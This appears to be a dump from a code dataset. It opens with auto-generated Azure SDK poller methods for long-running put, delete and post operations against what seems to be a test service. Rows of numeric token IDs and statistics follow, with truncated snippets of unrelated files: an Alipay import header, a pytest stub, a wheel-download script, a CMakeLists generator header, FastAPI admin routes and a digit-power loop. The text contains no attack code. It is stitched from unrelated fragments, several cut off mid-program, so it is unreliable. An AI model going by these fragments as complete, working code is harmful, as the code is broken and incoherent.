cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put200_invalid_json_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_invalid_header(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. The endpoint indicated in the Azure-AsyncOperation
header is invalid.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_invalid_header_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put_async_relative_retry_invalid_json_polling(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[JSONType]:
"""Long running put request, service returns a 200 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_relative_retry_invalid_json_polling_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete202_retry_invalid_header(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request receing a reponse
with an invalid 'Location' and 'Retry-After' headers.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete202_retry_invalid_header_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_invalid_header(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. The endpoint
indicated in the Azure-AsyncOperation header is invalid.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_relative_retry_invalid_header_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_delete_async_relative_retry_invalid_json_polling(self, **kwargs: Any) -> LROPoller[None]:
"""Long running delete request, service returns a 202 to the initial request. Poll the endpoint
indicated in the Azure-AsyncOperation header for operation status.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_async_relative_retry_invalid_json_polling_initial(cls=lambda x, y, z: x, **kwargs)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry_invalid_header(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with invalid
'Location' and 'Retry-After' headers.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_retry_invalid_header_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_invalid_header(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. The endpoint indicated in the Azure-AsyncOperation
header is invalid.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry_invalid_header_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_relative_retry_invalid_json_polling(
self, product: JSONType = None, **kwargs: Any
) -> LROPoller[None]:
"""Long running post request, service returns a 202 to the initial request, with an entity that
contains ProvisioningState=’Creating’. Poll the endpoint indicated in the Azure-AsyncOperation
header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_relative_retry_invalid_json_polling_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
class LROsCustomHeaderOperations(object):
"""LROsCustomHeaderOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
@distributed_trace
def begin_put_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
all requests. Long running put request, service returns a 200 to the initial request, with an
entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put_async_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_put201_creating_succeeded200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[JSONType]:
"""x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
all requests. Long running put request, service returns a 201 to the initial request, with an
entity that contains ProvisioningState=’Creating’. Polls return this value until the last poll
returns a ‘200’ with ProvisioningState=’Succeeded’.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns JSON object
:rtype: ~azure.core.polling.LROPoller[JSONType]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
# response body for status code(s): 200, 201
response.json() == {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[JSONType]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._put201_creating_succeeded200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post202_retry200(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
all requests. Long running post request, service returns a 202 to the initial request, with
'Location' and 'Retry-After' headers, Polls return a 200 with a response body after success.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post202_retry200_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
@distributed_trace
def begin_post_async_retry_succeeded(self, product: JSONType = None, **kwargs: Any) -> LROPoller[None]:
"""x-ms-client-request-id = 9C4D50EE-2D56-4CD3-8152-34347DC9F2B0 is required message header for
all requests. Long running post request, service returns a 202 to the initial request, with an
entity that contains ProvisioningState=’Creating’. Poll the endpoint indicated in the
Azure-AsyncOperation header for operation status.
:param product: Product to put.
:type product: JSONType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns None
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
Example:
.. code-block:: python
# JSON input template you can fill out and use as your body input.
product = {
"id": "str", # Optional. Resource Id.
"location": "str", # Optional. Resource Location.
"name": "str", # Optional. Resource Name.
"properties": {
"provisioningState": "str", # Optional.
"provisioningStateValues": "str" # Optional. Possible values
include: "Succeeded", "Failed", "canceled", "Accepted", "Creating",
"Created", "Updating", "Updated", "Deleting", "Deleted", "OK".
},
"tags": {
"str": "str" # Optional. A set of tags. Dictionary of
:code:`<string>`.
},
"type": "str" # Optional. Resource Type.
}
"""
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
polling = kwargs.pop("polling", True) # type: Union[bool, PollingMethod]
cls = kwargs.pop("cls", None) # type: ClsType[None]
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token = kwargs.pop("continuation_token", None) # type: Optional[str]
if cont_token is None:
raw_result = self._post_async_retry_succeeded_initial(
product=product, content_type=content_type, cls=lambda x, y, z: x, **kwargs
)
kwargs.pop("error_map", None)
if polling is True:
polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False:
polling_method = NoPolling()
else:
polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
| [
2,
279,
2645,
600,
25,
15560,
28,
18820,
12,
21834,
12,
6615,
198,
2,
19617,
28,
40477,
12,
23,
198,
2,
16529,
35937,
198,
2,
15069,
357,
66,
8,
5413,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
49962,
739,
262,
17168,
13789,
13,
... | 2.171319 | 130,295 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AssetFundInfo import AssetFundInfo
from alipay.aop.api.domain.AssetValidPeriod import AssetValidPeriod
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
11748,
33918,
198,
198,
6738,
435,
541,
323,
13,
64,
404,
13,
15042,
13,
9979,
415,
13,
22973,
34184,
1187,
1330,
163... | 2.752809 | 89 |
"""
Test cases for the regi0.verification.match function.
"""
import numpy as np
import pandas as pd
import pytest
from regi0.verification import match
@pytest.fixture
@pytest.fixture
| [
37811,
198,
14402,
2663,
329,
262,
842,
72,
15,
13,
332,
2649,
13,
15699,
2163,
13,
198,
37811,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
12972,
9288,
198,
198,
6738,
842,
72,
15,
13,
332,... | 3 | 64 |
import site
import tempfile
import urllib.request
import zipfile
wheel_url = (
'https://files.pythonhosted.org/packages/f0/b5'
'/45f1d9ad34194bf4b9cc79c7b30b2d8c656ab6b487d8c70c8826f6a9f922'
'/antspyx-0.3.2-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl'
)
if __name__ == '__main__':
main()
| [
11748,
2524,
198,
11748,
20218,
7753,
198,
11748,
2956,
297,
571,
13,
25927,
198,
11748,
19974,
7753,
198,
198,
22001,
62,
6371,
796,
357,
198,
220,
220,
220,
705,
5450,
1378,
16624,
13,
29412,
4774,
276,
13,
2398,
14,
43789,
14,
69,
... | 1.933735 | 166 |
"""
====================
CMakeLists Generator
====================
:Date: 2021-01-26
:Version: 1.0.0
:Author: Ginoko
:Contact: ginorasakushisu666@gmail.com
"""
import sys
import os
import getopt
import platform
import re
import traceback
is_windows = True
if __name__ == '__main__':
try:
check_platform()
main(sys.argv[1:])
except Exception as e:
print("repr(e): %s" % repr(e))
print("traceback.format_exc(): %s" % traceback.format_exc())
| [
37811,
198,
4770,
1421,
198,
34,
12050,
43,
1023,
35986,
198,
4770,
1421,
198,
198,
25,
10430,
25,
33448,
12,
486,
12,
2075,
198,
25,
14815,
25,
352,
13,
15,
13,
15,
198,
25,
13838,
25,
21444,
16044,
198,
25,
17829,
25,
39733,
410... | 2.528497 | 193 |
from typing import List
from fastapi import APIRouter, Depends, Body
from fastapi import UploadFile, File
from starlette.responses import Response
from models import ExternalContent
from routers import admin_only
from schemas import *
router = APIRouter()
@router.post("/browse", dependencies=[Depends(admin_only)])
@router.post("/read", dependencies=[Depends(admin_only)])
@router.post("/add", dependencies=[Depends(admin_only)])
@router.post("/edit", dependencies=[Depends(admin_only)])
@router.post("/delete", dependencies=[Depends(admin_only)])
| [
6738,
19720,
1330,
7343,
198,
198,
6738,
3049,
15042,
1330,
3486,
4663,
39605,
11,
2129,
2412,
11,
12290,
198,
6738,
3049,
15042,
1330,
36803,
8979,
11,
9220,
198,
6738,
3491,
21348,
13,
16733,
274,
1330,
18261,
198,
198,
6738,
4981,
13... | 3.267442 | 172 |
result = 0
for i in range(2, 200000):
digits = list(map(int, str(i)))
fifth = 0
for d in digits:
fifth += d**5
if i == fifth:
result += i
print(result) | [
20274,
796,
657,
198,
1640,
1312,
287,
2837,
7,
17,
11,
939,
830,
2599,
198,
197,
12894,
896,
796,
1351,
7,
8899,
7,
600,
11,
965,
7,
72,
22305,
198,
197,
43556,
796,
657,
628,
197,
1640,
288,
287,
19561,
25,
